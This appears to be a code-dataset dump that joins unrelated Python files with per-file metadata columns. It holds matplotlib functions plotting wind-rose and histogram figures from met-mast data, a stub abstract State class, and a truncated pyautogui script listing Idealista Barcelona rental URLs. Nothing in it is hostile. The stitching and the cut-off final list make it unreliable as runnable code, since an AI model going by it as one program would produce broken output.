3. leg (Matplotlib Legend): The legend object for the desired input data and categories.
"""
# set up data
dircol, _, _= utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
plotdat = metdat.groupby(metdat.index.month)
winddir = plotdat[dircol]
var = plotdat[varcol]
months = utils.monthnames()
# wind speed bins to use in wind roses
# get var divisions set up
if isinstance(bins, int):
nbins = bins
else:
nbins = len(bins)
# set up plotting colors
colors = utils.get_colors(nbins-1, basecolor='span')
colors += ['#3A4246'] # add something dark to the end.
colors = tuple(colors[0:nbins])
fig = plt.figure(figsize=(9,13))
for iax,month in enumerate(months):
ax = fig.add_subplot(4,3,iax+1, projection="windrose")
ax.bar(winddir.get_group(iax+1), var.get_group(iax+1),
bins=bins, nsector=36, colors=colors,
linewidth=0.35,
normed=True)
# Set the tick labels font
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Arial')
label.set_fontsize(12)
ax.set_title(month,fontsize=12,y=1.15)
if iax == 10:
leg = plt.legend(loc=8, ncol=2, bbox_to_anchor = (0.5,-0.65), frameon=False)
leg.set_title(catinfo['labels'][category])
fig.text(0.5, -0.085, r'$z={}$ m'.format(vertloc), ha='center', va='center')
axes = fig.get_children()[1:]
# adjust plot for specified max frequency
if ylim is None:
ylim = 0.0
for iax,month in enumerate(months):
ylim = np.max([ylim, axes[iax].get_ylim()[-1]])
for iax,month in enumerate(months):
axes[iax].set_ylim(0,ylim)
axes[iax].set_yticks(np.linspace(0.0,ylim,4))
# print(axes[iax].get_yticks())
axes[iax].set_yticklabels([str(np.round(x,decimals=1)) for x in axes[iax].get_yticks()])
fig.tight_layout()
return fig, axes, leg
def winddir_scatter(metdat, catinfo, category, vertloc=80, basecolor='red', exclude_angles=[(46, 228)]):
"""**Get Wind Direction Scatter Figure**.
Plot the wind direction scatter of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. vertloc (integer, float): Describes the desired vertical location alond the tower for analysis.
5. basecolor (string): Provides the color code information to get from "utils.py".
6. exclude_angles (tuple, list): Defines the start and stop angles to shade out regions according to International Electrotechnical Commission (IEC) standards.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
# set up data
dircol, _, _= utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
colors = utils.get_nrelcolors()
fig = plt.figure(figsize=(8,2.5))
ax = fig.add_subplot(111)
ax.scatter(metdat[dircol], metdat[varcol], marker='o',facecolor='w',color='k',lw=0.5,alpha=0.7)
ax.set_xlim([0,360])
for ii in range(len(exclude_angles)):
ax.axvspan(exclude_angles[ii][0], exclude_angles[ii][1], alpha=0.1, color=colors[basecolor][0])
ax.set_title(r'$z={}$ m'.format(vertloc))
ax.set_xlabel(r'Wind Direction [$^\circ$]')
ax.set_ylabel(catinfo['labels'][category])
return fig, ax#, leg
def stability_winddir_scatter(metdat, catinfo, category, vertloc=80, basecolor='red', exclude_angles=[(46, 228)]):
"""**Get Wind Direction Stability Scatter Figure**.
Plot the wind direction stability scatter of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. basecolor (string) [default: 'red']: Provides the color code information to get from "utils.py".
6. exclude_angles (tuple, list) [default: [(46, 228)]]: Defines the start and stop angles to shade out regions according to International Electrotechnical Commission (IEC) standards.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
stabconds = utils.get_stabconds()
colors = utils.get_colors(len(stabconds),basecolor='span')
nrelcolors = utils.get_nrelcolors()
# Set up data
dircol, _, _= utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
stabcol, _, _= utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
# dirind = utils.get_nearest_direction(metdat[category])
fig, ax = plt.subplots(len(stabconds),1, sharex=True, sharey=True, figsize=(6,8))
plotdat = metdat.groupby(stabcol)
for ind, stabcond in enumerate(stabconds):
ax.flatten()[ind].scatter(plotdat[dircol].get_group(stabcond),plotdat[varcol].get_group(stabcond),
marker='o',facecolor=colors[ind],color='k',lw=0.5,alpha=0.7)
ax.flatten()[ind].set_xlim([0,360])
# ax.flatten()[ind].set_ylim([0,120])
ax.flatten()[ind].legend([stabcond], fontsize=12, loc=1, frameon=False)
for ii in range(len(exclude_angles)):
ax.flatten()[ind].axvspan(exclude_angles[ii][0], exclude_angles[ii][1], alpha=0.1, color=nrelcolors[basecolor][0])
if ind == 0:
ax.flatten()[ind].set_title(r'$z={}$ m'.format(vertloc))
fig.tight_layout()
fig.text(0.5,0, r'Wind Direction [$^\circ$]', ha='center', va='center')
fig.text(0, 0.5, catinfo['labels'][category], ha='center', va='center', rotation='vertical')
return fig, ax #, leg
def groupby_scatter(metdat, catinfo, category, abscissa='direction', groupby='ti', nbins=5, vertloc=80, basecolor='span'):
"""**Get Wind Direction Grouped Scatter Figure**.
Plot the wind direction grouped scatter of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. abscissa (string) [default: 'direction']: independent variable to plot again
5. groupby (string) [default: 'ti']: Describes which categories to group by.
6. nbins (integer) [default: 5]: Divides the *groupby* variable into bins.
7. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
8. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
# set up data
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
groupcol, _, _= utils.get_vertical_locations(catinfo['columns'][groupby], location=vertloc)
abscol, _, _= utils.get_vertical_locations(catinfo['columns'][abscissa], location=vertloc)
temp = pd.cut(metdat[groupcol],5)
plotdat = metdat[[varcol,abscol,groupcol]].groupby(temp)
groups = list(plotdat.indices.keys())
colors = utils.get_colors(len(groups), basecolor=basecolor)
fig, ax = plt.subplots(figsize=(5,3), sharex=True, sharey=True)
for iax,group in enumerate(groups):
ax.scatter(plotdat[abscol].get_group(group), plotdat[varcol].get_group(group),facecolor=colors[iax],color='k',lw=0.5,alpha=0.7)
leg = ax.legend(groups, loc=6, bbox_to_anchor=(1, 0.5), frameon=False)
leg.set_title(catinfo['labels'][groupby])
# labels
ax.set_xlabel(catinfo['labels'][abscissa])
ax.set_ylabel(catinfo['labels'][category])
ax.set_title(r'$z={}$ m'.format(vertloc))
fig.tight_layout()
return fig, ax #, leg
def hist(metdat, catinfo, category, vertloc=80, basecolor='blue'):
"""**Get Histogram Figure**.
Plot the histogram of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. basecolor (string) [default: 'blue']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
colors = utils.get_nrelcolors()
color = colors[basecolor][0]
# set up data
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
data = metdat[varcol].dropna(how='any')
fig, ax = plt.subplots(figsize=(5,3))
ax.hist(data,
bins = 35,
facecolor=color,
edgecolor='k',
weights=np.ones(len(data)) / len(data), density=False)
ax.set_title(r'$z={}$ m'.format(vertloc))
fig.text(0,0.5,'Frequency [%]',rotation='vertical', ha='center', va='center')
fig.text(0.5,0,catinfo['labels'][category], ha='center', va='center')
fig.tight_layout()
return fig, ax
def monthly_hist(metdat, catinfo, category, vertloc=80, basecolor='blue'):
"""**Get Monthly Histogram Figure**.
Plot the monthly histogram of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. basecolor (string) [default: 'blue']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
colors = utils.get_nrelcolors()
color = colors[basecolor][0]
months = utils.monthnames()
# set up data
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
temp = metdat.groupby(metdat.index.month)
temp = temp[varcol]
binwidth = (metdat[varcol].dropna().max() - metdat[varcol].dropna().min())/35
bins = np.arange(metdat[varcol].dropna().min(),metdat[varcol].dropna().max(), binwidth)
fig, ax = plt.subplots(4,3, figsize=(9,9), sharex=True, sharey=True)
for im,month in enumerate(months):
data = temp.get_group(im+1).dropna()
ax.flatten()[im].hist(data,
bins=bins,
color=color,
edgecolor='k',
weights=np.ones(len(data))/len(data)*100)
ax.flatten()[im].set_title(month, fontsize=12)
fig.tight_layout()
fig.text(0,0.5,'Frequency [%]',rotation='vertical', ha='center', va='center')
fig.text(0.5,0,catinfo['labels'][category], ha='center', va='center')
return fig, ax
def hist_by_stability(metdat, catinfo, category, vertloc=80, basecolor='span'):
"""**Get Stability Grouped Histogram Figure**.
Plot the stability grouped histogram of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
stabconds = utils.get_stabconds()
stabcol, _, _= utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
colors = utils.get_colors(len(stabconds),basecolor=basecolor)
metdat = metdat.groupby(stabcol)
fig,ax = plt.subplots(len(stabconds),1, figsize=(4,6), sharex=True, sharey=True)
for ii,stab in enumerate(stabconds):
data = metdat[varcol].get_group(stab).dropna()
ax.flatten()[ii].hist(data,
facecolor=colors[ii],
edgecolor='k',
bins=50,
weights=np.ones(len(data)) / len(data),
density=False)
ax.flatten()[ii].legend([stab], fontsize=10, frameon=False)
ax.flatten()[0].set_title(r'$z={}$m'.format(vertloc))
fig.text(-0.03,0.5,'Frequency [%]',rotation='vertical', ha='center', va='center')
fig.text(0.5,0,catinfo['labels'][category], ha='center', va='center')
fig.tight_layout()
return fig, ax
def stacked_hist_by_stability(metdat, catinfo, category, vertloc=80):
"""**Get Stacked Stability Grouped Histogram Figure**.
Plot the stacked stability grouped histogram of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. vertloc (integer, float): Describes the desired vertical location alond the tower for analysis.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
stabconds = utils.get_stabconds()
stabcol, _, _= utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
colors = utils.get_colors(len(stabconds), basecolor='span')
plotdat = metdat.groupby(stabcol)
fig, ax = plt.subplots()
temp = pd.DataFrame({cond: plotdat[varcol].get_group(cond) for cond in stabconds})
temp.plot.hist(ax=ax,
stacked=True,
color=colors,
bins=35,
edgecolor='k',
legend=False,
# weights = np.ones(temp.shape) / len(temp.index),
density=True)
ax.set_xlabel(catinfo['labels'][category])
ax.set_title(r'$z={}$m'.format(vertloc))
fig.legend(stabconds, loc=6, bbox_to_anchor=(1, 0.5), frameon=False)
fig.tight_layout()
return fig, ax
def monthly_stacked_hist_by_stability(metdat, catinfo, category, vertloc=80):
"""**Get Monthly Stacked Stability Grouped Histogram Figure**.
Plot the monthly stacked stability grouped histogram of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
stabconds = utils.get_stabconds()
stabcol, _, _= utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
colors = utils.get_colors(len(stabconds), basecolor='span')
months = utils.monthnames()
plotdat = metdat.groupby([metdat.index.month, stabcol])
plotdat = plotdat[varcol]
fig, ax = plt.subplots(4,3, figsize=(9,10), sharex=True, sharey=True)
for iax, month in enumerate(months):
temp = pd.DataFrame({cond: plotdat.get_group((iax+1,cond)) for cond in stabconds})
temp.plot.hist(ax=ax.flatten()[iax],
stacked=True,
color=colors,
bins=35,
edgecolor='k',
legend=False,
# weights = np.ones(temp.dropna().shape) / np.prod(temp.shape),
density=True)
ax.flatten()[iax].set_title(month)
ax.flatten()[iax].set_ylabel('')
# fig.legend(stabconds, loc=8, bbox_to_anchor=(0, -0.1), edgecolor='w')
fig.text(0,0.58, 'Frequency', ha='center', va='center', fontsize=14, rotation='vertical')
leg = fig.legend(stabconds, loc=9, bbox_to_anchor=(0.55, 0.15), frameon=False)
fig.tight_layout()
fig.subplots_adjust(bottom=0.21)
fig.text(0.5, 0.16, catinfo['labels'][category], ha='center', va='center', fontsize=14)
return fig, ax#, leg
def normalized_hist_by_stability(metdat, catinfo, vertloc=80):
"""**Get Normalized Stability Grouped Histogram Figure**.
Plot the normalized stability grouped histogram of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
stabconds = utils.get_stabconds()
stabcol, _, _= utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
colors = utils.get_colors(len(stabconds), basecolor='span')
temp = metdat[stabcol].dropna()
garb = temp.groupby(temp.index.hour).value_counts(normalize=True)
garb.index.names = ['hour','stabclass']
garb = garb.reorder_levels(['stabclass','hour'])
hours = np.arange(24)
newbottom = np.zeros(24)
fig,ax = plt.subplots()
for jj,cond in enumerate(stabconds):
# Use this for missing data, also works for full data
a = garb.loc[cond]
b = a.index.tolist()
c = a.values.tolist()
for i in range(len(hours)):
if (hours[i]) in b:
pass
else:
b.insert(i,hours[i])
c.insert(i,0)
d = pd.Series(data = c, index = b)
ax.bar(hours, d, color=colors[jj], bottom=newbottom)
newbottom += c #<-- for if missing data, also works for full data
#ax.bar(hours, garb.loc[cond], color=colors[jj], bottom=newbottom)
#newbottom += garb.loc[cond]
ax.set_ylabel('Probability [%]')
ax.set_xlabel('Time of Day [Hour]')
fig.legend(stabconds)
#fig.legend(stabconds, loc=6, bbox_to_anchor=(1,0.5),framealpha=0)
fig.tight_layout()
return fig, ax
def normalized_monthly_hist_by_stability(metdat, catinfo, vertloc=80):
"""**Get Normalized Monthly Stability Grouped Histogram Figure**.
Plot the normalized monthly stability grouped histogram of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
months = utils.monthnames()
hours = np.arange(24)
stabcol, _, _= utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
stabconds = utils.get_stabconds()
colors = utils.get_colors(5,basecolor='span')
temp = metdat[stabcol].dropna()
plotdata = temp.groupby([temp.index.month.rename('month'), temp.index.hour.rename('hour')]).value_counts(normalize=True)
plotdata.index.names = ['month','hour','stabclass']
temp = plotdata.reorder_levels(['month','stabclass','hour'])
indexvals = [np.arange(1,13),stabconds, np.arange(24)]
indx = pd.MultiIndex.from_product(indexvals, names=['month','stabclass','hour'])
temp = temp.reindex(index=indx).fillna(0.0)
fig,ax = plt.subplots(4,3, figsize=(9,10), sharex=True, sharey=True)
for ii,month in enumerate(months):
newbottom = np.zeros(24)
for jj,cond in enumerate(stabconds):
pdat = temp.loc[ii+1,cond]
ax.flatten()[ii].bar(hours, pdat, color=colors[jj],bottom=newbottom)
newbottom += pdat
# fig.legend(stabconds, loc=8, bbox_to_anchor=(0, -0.1), edgecolor='w')
fig.text(-0.02,0.58, 'Probability [%]', ha='center', va='center', rotation='vertical')
leg = fig.legend(stabconds, loc=9, bbox_to_anchor=(0.55, 0.125), frameon=False)
fig.tight_layout()
fig.subplots_adjust(bottom=0.21)
fig.text(0.5, 0.165, 'Time of Day [Hour]', ha='center', va='center')
return fig, ax
###########################################
# End of Code
###########################################
| 46.293515
| 190
| 0.665266
| 5,429
| 40,692
| 4.934426
| 0.076626
| 0.032849
| 0.041435
| 0.052484
| 0.81918
| 0.784986
| 0.745493
| 0.71563
| 0.695845
| 0.679794
| 0
| 0.018448
| 0.21272
| 40,692
| 879
| 191
| 46.293515
| 0.817768
| 0.450826
| 0
| 0.494898
| 0
| 0
| 0.070935
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045918
| false
| 0.017857
| 0.017857
| 0
| 0.109694
| 0.015306
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8fa98b2bff82b11fb8787efe5b31e6e365b6732d
| 603
|
py
|
Python
|
Python/behavioral_patterns/state/state.py
|
ploukareas/Design-Patterns
|
8effde38d73ae9058c3028c97ef395644a90d55b
|
[
"BSD-3-Clause",
"MIT"
] | 28
|
2018-09-28T07:45:35.000Z
|
2022-02-12T12:25:05.000Z
|
Python/behavioral_patterns/state/state.py
|
ploukareas/Design-Patterns
|
8effde38d73ae9058c3028c97ef395644a90d55b
|
[
"BSD-3-Clause",
"MIT"
] | null | null | null |
Python/behavioral_patterns/state/state.py
|
ploukareas/Design-Patterns
|
8effde38d73ae9058c3028c97ef395644a90d55b
|
[
"BSD-3-Clause",
"MIT"
] | 5
|
2021-05-10T23:19:55.000Z
|
2022-03-04T20:26:35.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from abc import *
# ˄
class State(object, metaclass=ABCMeta):
# ˅
# ˄
@abstractmethod
def set_time(self, context, hour):
# ˅
pass
# ˄
@abstractmethod
def use(self, context):
# ˅
pass
# ˄
@abstractmethod
def alarm(self, context):
# ˅
pass
# ˄
@abstractmethod
def phone(self, context):
# ˅
pass
# ˄
@abstractmethod
def to_string(self):
# ˅
pass
# ˄
# ˅
# ˄
# ˅
# ˄
| 11.596154
| 39
| 0.426202
| 65
| 603
| 4.2
| 0.461538
| 0.274725
| 0.32967
| 0.29304
| 0.457875
| 0.373626
| 0.373626
| 0
| 0
| 0
| 0
| 0.002959
| 0.439469
| 603
| 51
| 40
| 11.823529
| 0.751479
| 0.129353
| 0
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.294118
| 0.058824
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
8ff60646e88d5f0d4605742533e793a7f2db3c11
| 37
|
py
|
Python
|
queenbee/io/__init__.py
|
AntoineDao/queenbee
|
800d5b26a69cffbce85864ea9430304b7fb8d11a
|
[
"MIT"
] | 10
|
2020-12-17T06:08:46.000Z
|
2022-02-12T12:06:08.000Z
|
queenbee/io/__init__.py
|
AntoineDao/queenbee
|
800d5b26a69cffbce85864ea9430304b7fb8d11a
|
[
"MIT"
] | 213
|
2020-12-06T03:34:01.000Z
|
2022-03-28T01:07:41.000Z
|
queenbee/io/__init__.py
|
AntoineDao/queenbee
|
800d5b26a69cffbce85864ea9430304b7fb8d11a
|
[
"MIT"
] | 4
|
2019-08-14T22:10:29.000Z
|
2020-09-21T22:46:11.000Z
|
"""Input and Output (IO) objects."""
| 18.5
| 36
| 0.621622
| 5
| 37
| 4.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 37
| 1
| 37
| 37
| 0.71875
| 0.810811
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
64ed48116f1da6b622a6e28ee7f1b0bb87aec93d
| 8,326
|
py
|
Python
|
p.py
|
Xapurri/WebScrapper
|
abf1ac075f46c2b0be607c04f9b768c4ac100866
|
[
"MIT"
] | null | null | null |
p.py
|
Xapurri/WebScrapper
|
abf1ac075f46c2b0be607c04f9b768c4ac100866
|
[
"MIT"
] | null | null | null |
p.py
|
Xapurri/WebScrapper
|
abf1ac075f46c2b0be607c04f9b768c4ac100866
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun May 3 16:09:48 2020
@author: Xapurri
"""
'Gràcia','Eixample','Gràcia','Horta-Guinardó','Les Corts','Nou Barris','Sant Andreu','Sant Martí','Sarria-Sant Gervasi','Sants-Montjuíc','Ciutat Vella'
import pyautogui as gui, pyperclip, time, keyboard
'''
DretaEixample = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-dreta-de-l-eixample/pagina-'
AntEsqEixample = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/l-antiga-esquerra-de-l-eixample/pagina-'
NovEsqEixample = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-nova-esquerra-de-l-eixample/pagina-'
SagradaFamilia = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-sagrada-familia/pagina-'
SantAntoni = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/sant-antoni/pagina-'
FortPienc = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/el-fort-pienc/pagina-'
Gracia = 'https://www.idealista.com/alquiler-viviendas/barcelona/gracia/pagina-'
HortaGuinardo = 'https://www.idealista.com/alquiler-viviendas/barcelona/horta-guinardo/pagina-'
LesCorts = 'https://www.idealista.com/alquiler-viviendas/barcelona/les-corts/pagina-'
NouBarris = 'https://www.idealista.com/alquiler-viviendas/barcelona/nou-barris/pagina-'
SantAndreu = 'https://www.idealista.com/alquiler-viviendas/barcelona/sant-andreu/pagina-'
SantMarti = 'https://www.idealista.com/alquiler-viviendas/barcelona/sant-marti/pagina-'
SGGalvany = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-galvany/pagina-'
PutxetFarro = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/el-putxet-i-el-farro/pagina-'
SGBonanova = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-la-bonanova/pagina-'
Sarria = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sarria/pagina-'
TresTorres = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/les-tres-torres/pagina-'
Tibidabo = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/vallvidrera-el-tibidabo-i-les-planes/pagina-'
SantsMontjuic = 'https://www.idealista.com/alquiler-viviendas/barcelona/sants-montjuic/pagina-'
CiutatVella = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/'
Raval = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-raval/pagina-'
Gotic = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-gotic/pagina-'
SantaCaterinaIRibera = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/sant-pere-santa-caterina-i-la-ribera/pagina-'
ciutat-vella/la-barceloneta = https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/la-barceloneta/pagina-
'''
nameDistrito = ['Tibidabo','Gracia','Sants-Montjuic','La Barceloneta','El Raval','El Gotic', 'Sant Pere,Santa Caterina','Sant Gervasi-Galvany','El Putxet i el Farro','La Bonanova','Sarria','Les Tres Torres','La Dreta de Eixample','La nova esquerra de Eixample','La Nova Esquerra Eixample','Sagrada Familia','Sant antoni','El Fort Pienc','Horta-Guinardo','Les Corts','Nou Barris','Sant Andreu','Sant MArti']
Distritos = ['sarria-sant-gervasi/vallvidrera-el-tibidabo-i-les-planes','Gracia','Sants-Montjuic', 'ciutat-vella/la-barceloneta','ciutat-vella/el-raval', 'ciutat-vella/el-gotic', 'ciutat-vella/sant-pere-santa-caterina-i-la-ribera', 'sarria-sant-gervasi/sant-gervasi-galvany', 'sarria-sant-gervasi/el-putxet-i-el-farro', 'sarria-sant-gervasi/sant-gervasi-la-bonanova', 'sarria-sant-gervasi/Sarria', 'sarria-sant-gervasi/les-tres-torres', 'eixample/la-dreta-de-l-eixample', 'eixample/l-antiga-esquerra-de-l-eixample', 'eixample/la-nova-esquerra-de-l-eixample', 'eixample/la-sagrada-familia', 'eixample/sant-antoni', 'eixample/el-fort-pienc', 'horta-guinardo', 'les-corts', 'nou-barris', 'sant-andreu', 'sant-marti']
Distritos_links = ['https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/vallvidrera-el-tibidabo-i-les-planes/pagina-','https://www.idealista.com/alquiler-viviendas/barcelona/gracia/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sants-montjuic/pagina-','https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/la-barceloneta/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-raval/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-gotic/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/sant-pere-santa-caterina-i-la-ribera/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-galvany/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/el-putxet-i-el-farro/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-la-bonanova/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sarria/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/les-tres-torres/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-dreta-de-l-eixample/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/l-antiga-esquerra-de-l-eixample/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-nova-esquerra-de-l-eixample/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-sagrada-familia/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/sant-antoni/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/el-fort-pienc/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/horta-guinardo/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/les-corts/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/nou-barris/pagina-', 